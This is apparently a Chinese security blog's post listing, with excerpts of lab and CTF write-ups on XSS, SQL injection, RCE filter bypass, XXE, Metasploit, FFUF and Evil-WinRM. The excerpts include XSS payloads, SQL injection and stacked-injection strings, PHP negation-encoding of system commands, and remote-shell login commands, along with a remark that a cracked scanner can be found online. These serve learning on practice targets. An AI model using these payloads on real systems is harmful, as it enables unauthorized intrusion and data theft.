未读
最新文章xss-labs通关
#xss-labs 靶场通关记录xss-level1
通常的xss 都是出现在输入框中,这关并没有发现。看url 发现name 参数接受了值尝试更改值。
发现这个参数是可控的,并输出了结果到页面上。插入xss payload
<script>alert("xss")</script>
xss-level2
插入payload无法弹窗,查看源码发现需要闭合。
"><script>alert("xss");</script>
xss-level3
发现被html 实体化编码了,导致无法xss.
htmlspecialchars()绕过php 自带的htmlspecialchars() 函数可以对用户输入的值进行html 实体化编码。在 8.1.0 及以上的 PHP 版本中,这个函数默认会转义 <、>、&、'、" 这五个字符,基本可以防范这里的 XSS 攻击。但是,8.1.0 以下版本的 PHP 默认只会转义 <、>、&、 ...
未读
sqli-labs靶场
#sqli-labs靶场通关less-1
根据提示需要输入一个ID和值(请输入ID作为带有数值的参数)
当输入id=1时会显示id 为1的数据。这里多演示几个对照数据库。
黑盒角度从黑盒角度,只能去测试这个地方是否有注入点。
猜测是数字型时
and 1=1 --+ and 1=2 --+原始sql查询语句为 select * from users where id=$id;执行恶意sql语句后 select* from users where id=1 and 1=1--+;
由于原始sql语句是字符型没有闭合,发现页面没有任何回显
字符型
' and '1'='1' and '1'='2原始sql查询语句为 select * from users where id='$id';执行恶意sql语句后 select* from users where id='1'and '1'='2';
页面回显不同
白 ...
未读
“靶机--CozyHosting”
# 来自hack the box 的靶机难度是简单的
一.端口扫描先使用nmap 进行端口扫描
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-31 23:42 CSTStats: 0:00:03 elapsed; 0 hosts completed (0 up), 1 undergoing Ping ScanParallel DNS resolution of 1 host. Timing: About 0.00% doneNmap scan report for 10.10.11.230Host is up (0.33s latency).Not shown: 65532 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh| ssh-hostkey: | 256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)|_ 256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7 ...
msfMetasploit使用
#什么是metasploitMetasploit是使用最广泛的开发框架。Metasploit 是一个强大的工具,可以支持渗透测试的所有阶段,从信息收集到后利用
metasploit有两个版本,分别是:
Metasploit Pro:商业版本,有助于任务的自动化和管理。该版本有图形用户界面( GUI)。
Metasploit Framework:从命令行运行的开源版本。
Metasploit框架是一组工具,可用于信息收集、扫描、利用、利用开发、后利用等。虽然 Metasploit 框架的主要用途集中在渗透测试领域,但它对于漏洞研究和漏洞利用开发也很有用。
Metasploit框架的主要组件可概括如下:
msfconsole:主命令行界面。
模块:支持模块,例如漏洞利用、扫描器、有效负载等。
工具:有助于漏洞研究、漏洞评估或渗透测试的独立工具。其中一些工具包括msfvenom、pattern_create 和pattern_offset。我们将在本模块中介绍 msfvenom,但pattern_create 和pattern_offset 是在漏洞利用开发中有用的工具
在kali中 ...
ctfRCE篇
# CTF RCE常见CTF RCE类型
无参数类型
无字母类型绕过(异或,自增,取反)
关键字绕过
无字母类型(取反绕过)例题:
代码中 异或 和字母都被过滤掉了 这种情况下可以使用取反来绕过。
<?php $a="system("ls")"; echo urlencode(~$a); ?>
但是整个取反行不通,看了下评论区说是括号干扰。
只能函数和参数分开取反
<?php$a = "system";$b = "ls /";echo urlencode(~$a);print("\n");echo urlencode(~$b);?>
先用这个查看 跟下有没有flag文件(一般flag都在根下)
这里要用括号然后再用取反符还原即可。看见了flag文件
再把上面的代码改下即可
<?php$a = "system";$b = "cat /flllllaaaaaaggggggg";echo ...
burp+xray联动漏扫
#网上也有很多相关的文章,但还是想记录一下xrayxray是长亭科技开发的一款漏洞扫描工具。除了基本的漏洞也可以添加其他的poc。
xray分为免费版和付费版。至于付费版可以去网上找破解。
基础使用1.使用基础爬虫爬取并对爬虫爬取的链接进行漏洞扫描
xray webscan --basic-crawler http://example.com --html-output vuln.html
2.使用 HTTP 代理进行被动扫描
xray webscan --listen 127.0.0.1:7777 --html-output proxy.html
3.只扫描单个 url,不使用爬虫
xray webscan --url http://example.com/?a=b --html-output single-url.html
burp设置
不能和浏览器代理端口相同
使用先把如上配置配置好后。使用xray开启本地监听。在访问网页后会进行自动爬取漏洞扫描
ps:要扫描https网站要安装CA证书
xray: 运行 xray genca
FFUF工具
#FFUF 一款模糊测试工具FFUF功能1.进行虚拟主机子域名爆破
2.用户名密码爆破
3.目录爆破
FFUF 详细参数-w : 指定字典
-u:指定域名
-X:请求方式 (get post put delete)
-e: 指定文件类型 (.html, .php,.txt)
-H: 添加数据包附加标头
-mc :指定状态代码。
-ml:指定响应的行数
-mr:指定正则表达式模式
-ms:指定响应大小
-mw:指定响应的字数
-fw:按字数过滤
-fl:按行数过滤
-fs:按响应大小过滤
-fc:按状态代码过滤
-fr:按正则表达式模式过滤
演示使用FFUF进行目录爆破
使用以上参数时会发生误报
这时需要用 -fs -fc -fw -fr -fl 中的一个进行过滤 我使用的fs 进行大小的过滤。恢复正常
看看爆破的页面是否存在。大多都是301重定向。第一个目录被禁止访问
FFUF虚拟主机子域名爆破某些子域并不总是托管在可公开访问的DNS结果中,例如 Web 应用程序或管理门户的开发版本。相反,DNS 记录可以保存在私有 DNS 服务器上,或者记录在开发人员计算机上的 ...
强网杯2019 随便注
#前言:最近在学习ctf,遇到强网杯2019,记录一下。开局打开环境后便有一个登陆框,尝试使用1’ 进行sql注入测试。发现报错信息确认了存在sql注入。
进行列数数量的判断。 测试为2
尝试 进行 union 注入。 发现 关键字被过滤掉了。
堆叠注入进行堆叠注入的尝试。查询表名称
发现两个表 words 1919810931114514 分别对两个表进行字段查询
1'; show columns from words
';show columns from `1919810931114514`;#
接下来就是骚操作了。因为通过传参1进去可以发现回显了两个信息,然而words表刚好有两个字段。 我们就可以把 1919…. 这个表名,字段名进行更改,更改为words,id 进行查询 .后台的 sql语句就应该是 select * form words where id =1
在进行操作前需要知道sql语句的更改:
1.alter table 表名 rename 新表名;
2.alter table 表名 change 字段 新字 ...
xxe漏洞学习
#前言:今天学习了 xee漏洞的简单利用。为此记录一下。
xml在学习xee漏洞开始前,要先了解xml文档的语法。
什么是xml?可延伸标记式语言(英语:E x tensible M arkup L anguage,简称:XML)是一种[标记式语言XML是从标准通用标记式语言(SGML)中简化修改出来的。它主要用到的有可延伸标记式语言、可延伸样式语言(XSL)、XBRL和XPath等。
xml是互联网数据传输的重要工具,它可以跨越互联网任何的平台,不受编程语言和操作系统的限制,非常适合Web传输,而且xml有助于在服务器之间穿梭结构化数据,方便开发人员控制数据的存储和传输。
xml 语法
1.XML元素都必须有关闭标签。2.XML 标签对大小写敏感。3.XML 必须正确地嵌套。4.XML 文档必须有根元素。5.XML 的属性值须加引号。
xee漏洞从所周知大部分漏洞基本都是通过用户可控参数进行传参,xee漏洞也是如此。
xxe的漏洞所在位置在DTD部分 ,而DTD相当于根,这个又分为 内部DTD文档 外部DTD文档 内外部DTD文档。
内部DTD文档
<!DOCTYPE 根元素 ...
evli-minwrm工具
#做htb靶场时遇到了个重要的工具记录一下。(直接搬运国外文章😃)什么是 Evil-WinRM ❓Evil-WinRM 是一种渗透工具,它利用 Windows 远程管理服务来获得对远程 Windows 系统的未经授权的访问。
它利用 WinRM 服务中存在的弱配置在目标 Windows 计算机上建立远程 shell 会话,从而允许攻击者执行管理任务并运行脚本。
由于 Linux 默认情况下未安装 PowerShell,因此我们将使用一个名为 Evil-WinRM 的工具,该工具是为这种情况而设计的。
如何使用 Evil-WinRM 💡仅当远程目标系统中启用了 WinRM 服务时,才能使用 Evil-WinRM 工具。这可以通过使用 nmap 检查两个默认 winrm 服务端口 5985 和 5986 是否打开来确认。
使用纯文本或哈希值登陆。纯文本密码登陆:
evil-winrm -i <ip_address> -u <username> -p <password>
哈希值密码登陆:
evil-winrm -i <ip_address&g ...